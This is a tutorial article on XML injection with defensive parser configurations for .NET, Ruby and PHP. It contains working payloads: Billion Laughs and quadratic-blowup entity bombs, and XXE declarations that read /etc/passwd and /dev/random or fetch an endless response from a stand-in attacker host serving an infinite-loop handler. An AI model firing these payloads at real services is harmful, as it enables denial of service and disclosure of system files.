Muhammad Ahmad

Web Services Security: XML Injection

What is XML: definition and further details

XML stands for eXtensible Markup Language, a derivative of SGML (upon which HTML is also based) and used to represent structured data objects as human-readable text. XML is designed as a format for the storage and transmission of data. XML is customizable (extensible) so that it can be tailored for any application by defining how data is organized and represented.

Here's an example of a simple XML file:

<?xml version="1.0" encoding="UTF-8"?>
<message>
  <to>receiver</to>
  <from>sender</from>
  <body>data</body>
</message>

The first line of the text file identifies the file as an XML document and declares that it is encoded as Unicode “UTF-8” characters. As a best practice, every XML file should begin with such an identification though it's not strictly required.

All applications should use a standard parser library to consume XML text like this example. The parser converts the XML text stream into a tree-structured representation of the data, abstracting away the syntactic details of the source so that the application can process the data directly. For the example above, an XML parser would create a data structure as shown below:

message
├── to: "receiver"
├── from: "sender"
└── body: "data"

Using the tree structure, software can easily identify the root element (message) and confirm that it has the three expected sub-elements, each with its corresponding text value available for processing.
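As a minimal sketch of that parsing step, the following snippet parses the message document and walks the resulting tree. Python and its standard `xml.etree.ElementTree` module are this example's choice, not something the article prescribes, and the `describe` helper is hypothetical.

```python
import xml.etree.ElementTree as ET

# The example document from above, kept as bytes so the parser
# reads the encoding from the XML declaration itself.
DOCUMENT = b"""<?xml version="1.0" encoding="UTF-8"?>
<message>
  <to>receiver</to>
  <from>sender</from>
  <body>data</body>
</message>
"""


def describe(document):
    """Return the root tag and a list of (child tag, child text) pairs."""
    root = ET.fromstring(document)
    children = [(child.tag, child.text) for child in root]
    return root.tag, children


root_tag, children = describe(DOCUMENT)
print(root_tag)
for tag, text in children:
    print(f"  {tag}: {text}")
```

The application code never touches angle brackets or escaping rules; it only sees element names and text values.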

Applications use XML as a handy data format for all manner of custom data representations, as well as for a number of standard formats that are built on top of XML. Keep in mind that whenever an application handles any of the following kinds of data (and many more than can be listed here), an XML parser is likely running under the covers, and hence these security issues may very well apply.

Data formats based on XML include, but are not limited to:

  • SOAP
  • .NET configuration files
  • WebSphere trace files
  • WSDL
  • RSS
  • SVG

XML Injection Attacks: Common Types

The attacks described below apply to any application that parses XML input.
Specifically, the attacker supplies specially crafted XML that the application consumes, with the intention of tricking the XML parser into some harmful action.
XML parsers that have bugs, or that are misconfigured and hence vulnerable to manipulation, are generally susceptible to two kinds of attacks:

  • XML Bombs (Billion laughs attack): The XML parser may crash or execute incorrectly given certain input data, resulting in a Denial of Service attack.
  • XXE Disclosure (XML external entity): The XML parser may mistakenly leak sensitive information.

Keep in mind that attacks may utilize perfectly valid XML, or possibly malformed XML (unless the parser strictly detects and rejects it safely).

XML Bomb Attack

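An XML Bomb may be valid XML, but it is designed to make the XML parser, or the application processing its output, hang or crash.
For example, consider the Billion Laughs Attack, a short XML file whose nested entities multiply in size when the parser expands them. In its classic form, a base entity plus nine nested entities, each referencing the previous one ten times, expand into a billion copies of "lol", some 3 gigabytes of data. The listing below nests one level fewer (lol2 through lol9 on top of lol), so it expands to 100 million copies, roughly 300 megabytes of text. Data of this size crashes many applications, and it is easy to see how the size could be scaled arbitrarily larger by adding levels.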

<?xml version="1.0"?>
<!DOCTYPE lolz [
  <!ENTITY lol "lol">
  <!ENTITY lol2 "&lol;&lol;&lol;&lol;&lol;&lol;&lol;&lol;&lol;&lol;">
  <!ENTITY lol3 "&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;">
  <!ENTITY lol4 "&lol3;&lol3;&lol3;&lol3;&lol3;&lol3;&lol3;&lol3;&lol3;&lol3;">
  <!ENTITY lol5 "&lol4;&lol4;&lol4;&lol4;&lol4;&lol4;&lol4;&lol4;&lol4;&lol4;">
  <!ENTITY lol6 "&lol5;&lol5;&lol5;&lol5;&lol5;&lol5;&lol5;&lol5;&lol5;&lol5;">
  <!ENTITY lol7 "&lol6;&lol6;&lol6;&lol6;&lol6;&lol6;&lol6;&lol6;&lol6;&lol6;">
  <!ENTITY lol8 "&lol7;&lol7;&lol7;&lol7;&lol7;&lol7;&lol7;&lol7;&lol7;&lol7;">
  <!ENTITY lol9 "&lol8;&lol8;&lol8;&lol8;&lol8;&lol8;&lol8;&lol8;&lol8;&lol8;">
]>
<lolz>&lol9;</lolz>
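The expanded size of such a document can be checked with simple arithmetic instead of by parsing the bomb. The sketch below is illustrative only (the function name and parameters are hypothetical): it multiplies the length of the base text by the number of references at each nested level.

```python
def expanded_length(base, fanout, nested_levels):
    """Length of the outermost entity once all nested references are expanded.

    Each nested level repeats the previous level `fanout` times, so the
    length is multiplied by `fanout` once per level.
    """
    length = len(base)
    for _ in range(nested_levels):
        length *= fanout
    return length


# The listing above: "lol" plus eight nested entities (lol2 .. lol9).
listing = expanded_length("lol", fanout=10, nested_levels=8)

# The classic formulation with nine nested entities (one extra level).
classic = expanded_length("lol", fanout=10, nested_levels=9)

print(f"listing: {listing:,} characters")
print(f"classic: {classic:,} characters")
```

Each additional entity line in the document costs the attacker well under a hundred bytes but multiplies the expanded size by ten.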

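Another example of a similar attack is the Quadratic Blowup Attack. Instead of nesting entities, it defines a single long entity and references it many times, so the expanded size grows with the square of the input size: a 50,000-character entity referenced 50,000 times expands to 2.5 billion characters, about 2.5 gigabytes.

In the listing below, “...” stands for further repetitions.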

<?xml version="1.0"?>
<!DOCTYPE kaboom [
  <!ENTITY a "aaaaaaaaaaaaaaaaaa...">
]>
<kaboom>&a;&a;&a;&a;&a;&a;&a;&a;&a;...</kaboom>
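The quadratic growth can be observed safely at a small scale. The sketch below assumes Python's standard `xml.etree.ElementTree`, which expands internal entities by default; the `quadratic_payload` helper and the value of `n` are made up for illustration and are deliberately tiny.

```python
import xml.etree.ElementTree as ET


def quadratic_payload(n):
    """Build a document with one n-character entity that is referenced n times."""
    entity = "a" * n
    references = "&a;" * n
    return (
        '<?xml version="1.0"?>\n'
        f'<!DOCTYPE kaboom [\n  <!ENTITY a "{entity}">\n]>\n'
        f"<kaboom>{references}</kaboom>"
    ).encode("ascii")


n = 200  # deliberately small; a real attack uses tens of thousands
payload = quadratic_payload(n)

# Parsing expands every &a; reference into the full entity text.
root = ET.fromstring(payload)
expanded = len(root.text)

print(f"input bytes:         {len(payload)}")
print(f"expanded characters: {expanded}")
```

The input grows linearly with `n` (about four bytes per unit of `n`), while the expanded text grows as `n * n`.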

Mitigating XML Bombs

The best way to avoid XML Bombs is for the application to configure the XML parser to disable inline expansion of entities. Without inline expansion the size increase will not be available to the attacker and these attacks will be rendered harmless.
When the application requires entity expansion, or if the XML parser does not provide this configuration option, set the parser to enforce a limit on the size of expanded entities.
Here is sample code that configures the standard .NET 4.0 XML reader to prohibit DTDs, and with them any entity declarations:

XmlReaderSettings settings = new XmlReaderSettings();
settings.DtdProcessing = DtdProcessing.Prohibit;
XmlReader reader = XmlReader.Create(stream, settings);

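With this configuration, neither XML Bomb results in excessive memory consumption: the reader throws an XmlException as soon as it encounters the DOCTYPE declaration, before any entity is expanded.
A parser that is instead configured to leave entity references unexpanded would, rather than producing gigabytes of data, return a data structure that shows the entity references as they are expressed in the source XML.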
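The same idea can be sketched outside .NET. The example below assumes Python's standard `xml.parsers.expat` module and refuses any document that carries a DOCTYPE; the `DTDForbidden` exception and the `element_names_without_dtd` helper are hypothetical names for this illustration, not part of any library.

```python
import xml.parsers.expat


class DTDForbidden(ValueError):
    """Raised when a document contains a DOCTYPE declaration."""


def element_names_without_dtd(data):
    """Parse `data`, refusing any DOCTYPE, and return element names in document order."""
    names = []
    parser = xml.parsers.expat.ParserCreate()

    def reject_doctype(name, system_id, public_id, has_internal_subset):
        # Raising here aborts the parse before any entity is declared or expanded.
        raise DTDForbidden(f"DOCTYPE {name!r} is not allowed")

    parser.StartDoctypeDeclHandler = reject_doctype
    parser.StartElementHandler = lambda name, attrs: names.append(name)
    parser.Parse(data, True)
    return names


plain = b"<message><to>receiver</to></message>"
bomb = b'<!DOCTYPE lolz [<!ENTITY lol "lol">]><lolz>&lol;</lolz>'

print(element_names_without_dtd(plain))
try:
    element_names_without_dtd(bomb)
except DTDForbidden as error:
    print("rejected:", error)
```

Rejecting the DOCTYPE outright is the bluntest option: documents that legitimately rely on a DTD are refused as well.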

If the application needed the expanded form of the relevant entity it would have to construct it directly and in the process have the appropriate checks to avoid causing the Denial of Service itself.

With the entity size limited, if an XML Bomb were parsed it would exceed this limit and the XML parser would throw an exception instead of causing a Denial of Service. Naturally, the limit must be set such that it does not impair useful functionality of valid uses.
Here's an example in Ruby's REXML parser:

REXML::Document.entity_expansion_limit = 0

With this configuration no entity expansion is permitted: the limit counts expansions, so the very first one already exceeds zero and REXML raises an error.
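Where a parser offers no such setting, a size limit can be approximated by inspecting entity declarations before anything is expanded. The sketch below is one possible approach under stated assumptions, not a definitive implementation: it uses Python's standard `xml.parsers.expat`, accepts only internal general entities, and rejects forward references so that every size is known when it is needed. The names `EntityLimitExceeded` and `parse_text_with_entity_limit`, and the default limit, are hypothetical.

```python
import re
import xml.parsers.expat

NAMED_REF = re.compile(r"&([^;&#\s]+);")  # named references such as &lol;
PREDEFINED = {"lt": 1, "gt": 1, "amp": 1, "apos": 1, "quot": 1}


class EntityLimitExceeded(ValueError):
    """Raised when a declared entity would expand past the configured limit."""


def parse_text_with_entity_limit(data, max_entity_chars=10_000):
    """Return the document's character data, enforcing a per-entity size cap."""
    sizes = dict(PREDEFINED)  # entity name -> fully expanded length
    chunks = []

    def on_entity_decl(name, is_parameter, value, base, system_id, public_id, notation):
        if is_parameter or value is None:
            # Parameter, external and unparsed entities are outside this sketch.
            raise EntityLimitExceeded(f"entity {name!r}: only internal general entities accepted")
        if name in sizes:
            return  # XML keeps the first declaration of a name
        total = len(NAMED_REF.sub("", value))  # literal characters in the value
        for ref in NAMED_REF.findall(value):
            if ref not in sizes:
                # A forward reference would hide the real size from this check.
                raise EntityLimitExceeded(f"entity {name!r} references undeclared {ref!r}")
            total += sizes[ref]
        if total > max_entity_chars:
            raise EntityLimitExceeded(f"entity {name!r} would expand to {total} characters")
        sizes[name] = total

    parser = xml.parsers.expat.ParserCreate()
    parser.EntityDeclHandler = on_entity_decl
    parser.CharacterDataHandler = chunks.append
    parser.Parse(data, True)
    return "".join(chunks)


doc = b'<!DOCTYPE r [<!ENTITY a "xxxxx"><!ENTITY b "&a;&a;&a;&a;">]><r>&b;</r>'
print(len(parse_text_with_entity_limit(doc, max_entity_chars=100)))
```

This caps the size of each individual entity only. Many references to an entity that stays under the cap, as in the Quadratic Blowup Attack, would still need a separate limit on the total expanded output.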

XML External Entity (XXE) Attacks

One feature of XML that can be used to attack an application is the external entity. By providing XML input that contains a reference to an external entity, an attacker can cause the XML parser to read the referenced data and include it in the resulting XML data. An external entity pulls its replacement value from an external URI, so it can potentially access local files as well as network resources. If there is a pathway that exposes the resulting data, the attacker can exfiltrate it by exploiting the access privileges of the XML parser process. Alternatively, referencing a very large data source can lead to Denial of Service.

For example, consider an XML input that references the file /dev/random, an endless stream of random bytes (on systems where it draws on an entropy pool, successive reads block when the pool is drained and resume once entropy builds back up). Since an XML parser reads data from the external entity until end-of-file, it will consume and construct data endlessly, eventually overloading the system to the point of failure.

<!ENTITY xxe SYSTEM "file:///dev/random" >

An example of information disclosure is an XML input that references the file /etc/passwd, the user account file on classic Unix systems.
Modern systems no longer store password hashes in this file, but it still lists user names and may contain private contact information.

<!ENTITY xxe SYSTEM "file:///etc/passwd" >

In the following example, an attacker achieves Denial of Service through an XXE attack. In this case, the xxe entity is replaced by the response that dos.ashx produces. As the handler code below shows, dos.ashx writes output in an infinite loop, so the xxe entity keeps growing indefinitely.
If the attacker also manages to run dos.ashx on another party's machine rather than their own, the DoS affects that machine as well, since it has to serve the endless response.

An .ashx file is an ASP.NET generic HTTP handler: code that processes a request and writes the response directly.

<!ENTITY xxe SYSTEM "http://www.attacker.com/dos.ashx" >

// dos.ashx
public void ProcessRequest(HttpContext context) {
  context.Response.ContentType = "text/plain";

  // Fill a 1 MB buffer with the letter 'A'.
  byte[] data = new byte[1000000];
  for (int i = 0; i < data.Length; i++)
    data[i] = (byte)'A';

  // Stream the buffer forever; the response never ends.
  while (true) {
    context.Response.OutputStream.Write(data, 0, data.Length);
    context.Response.Flush();
  }
}

Mitigating XXE Attacks

The easiest mitigation is to configure the XML parser not to resolve external references at all. Here are two examples, for .NET 4.0 and PHP:

XmlReaderSettings settings = new XmlReaderSettings();
settings.XmlResolver = null;
XmlReader reader = XmlReader.Create(stream, settings);

// Deprecated as of PHP 8.0, where external entity loading is disabled by default.
libxml_disable_entity_loader(true);
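For comparison, here is a hedged sketch of the same policy in Python, assuming the standard `xml.parsers.expat` module. The handler is invoked when the parser reaches a reference to an external entity, and raising from it aborts the parse. `ExternalEntityForbidden` and `parse_text_without_external_entities` are hypothetical names used only for this illustration.

```python
import xml.parsers.expat


class ExternalEntityForbidden(ValueError):
    """Raised when a document tries to pull in an external entity."""


def parse_text_without_external_entities(data):
    """Return the document's character data, refusing external entity references."""
    chunks = []
    parser = xml.parsers.expat.ParserCreate()

    def refuse(context, base, system_id, public_id):
        # This hook is where an application would normally fetch the URI;
        # raising instead means nothing is ever read from it.
        raise ExternalEntityForbidden(f"external entity {system_id!r} refused")

    parser.ExternalEntityRefHandler = refuse
    parser.CharacterDataHandler = chunks.append
    parser.Parse(data, True)
    return "".join(chunks)


xxe = b'<!DOCTYPE r [<!ENTITY xxe SYSTEM "file:///etc/passwd">]><r>&xxe;</r>'
try:
    parse_text_without_external_entities(xxe)
except ExternalEntityForbidden as error:
    print("rejected:", error)
```

Documents without external references parse as usual, so the check costs nothing for well-behaved input.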

Of course, XML external entities can be useful or even essential, in which case completely disabling the feature is not an acceptable solution. In these cases consider configuring, or if necessary, modifying the XML parser in order to apply one or more of these strategies:

  • Enforce a timeout so that slow or very large responses cannot tie up the parser indefinitely.
  • Limit the type and amount of data that can be retrieved.
  • Restrict the XmlResolver from retrieving resources on the local host.
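The second and third strategies can be sketched as two small checks that a custom resolver might apply before and while reading an external resource. This is an illustration under assumptions, written in Python: the allowed scheme, the host name `schemas.example.com`, the size cap, and both function names are hypothetical.

```python
import io
from urllib.parse import urlsplit

ALLOWED_SCHEMES = {"https"}               # no file:, no plain http:
ALLOWED_HOSTS = {"schemas.example.com"}   # hypothetical trusted host
MAX_ENTITY_BYTES = 64 * 1024              # hypothetical size cap


def is_allowed_entity_uri(uri):
    """Accept only URIs with an allowed scheme and an allow-listed host."""
    parts = urlsplit(uri)
    return parts.scheme in ALLOWED_SCHEMES and parts.hostname in ALLOWED_HOSTS


def read_limited(stream, limit=MAX_ENTITY_BYTES):
    """Read at most `limit` bytes from `stream`; raise if the source is larger."""
    chunks = []
    remaining = limit + 1  # one extra byte reveals an oversized source
    while remaining > 0:
        chunk = stream.read(min(8192, remaining))
        if not chunk:
            break
        chunks.append(chunk)
        remaining -= len(chunk)
    if remaining == 0:
        raise ValueError(f"external entity larger than {limit} bytes")
    return b"".join(chunks)


print(is_allowed_entity_uri("https://schemas.example.com/common.ent"))
print(is_allowed_entity_uri("file:///etc/passwd"))
print(len(read_limited(io.BytesIO(b"a" * 100))))
```

An allow-list excludes the local host and local files without having to enumerate every spelling of "localhost". The timeout from the first strategy would be set where the stream is opened, for example through the `timeout` argument of `urllib.request.urlopen`.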

Conclusion

XML attacks occur when specially crafted XML input causes harm in the application that parses it.
Two well-known attacks are XML Bombs (Denial of Service) and XXE, or XML External Entity, attacks (information disclosure or Denial of Service).
The preferred mitigation is to configure the XML parser to disable, or at least safely limit, the XML features that cause these problems, as described above. When configuration is not sufficient, the XML parser itself needs modification, but this is a riskier and more labor-intensive method.
